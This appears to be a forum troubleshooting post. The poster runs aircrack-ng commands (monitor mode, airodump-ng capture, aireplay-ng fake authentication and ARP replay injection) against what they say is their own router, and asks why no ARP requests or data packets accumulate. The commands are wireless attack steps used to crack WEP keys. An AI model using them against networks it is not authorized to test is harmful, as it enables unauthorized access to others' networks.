i have BT4, and I can easily set the monitor mode to the wlan0
Code:
airmon-ng start wlan0
and it says it is now available monitor mode on mon0
so i use mon0
i wanna make test to to my Router
its BSSID is exported to AP
and my mac address is exported to WIFI
i try
Code:
airodump-ng -c 10 -w test --bssid $AP mon0
and
Code:
aireplay-ng -1 0 --bssid $AP -h $WIFI mon0
it keep telling me
Sending Authentication Request and sometimes it is successful and i get
Sending Authentication Request
Authentication Successful
Sending Association Request
Association Successful
Code:
aireplay-ng -3 -b $AP -h $WIFI mon0
but i get read packets increased but 0 ARP requests and 0 ACKs
so #Data doesn't get increased!!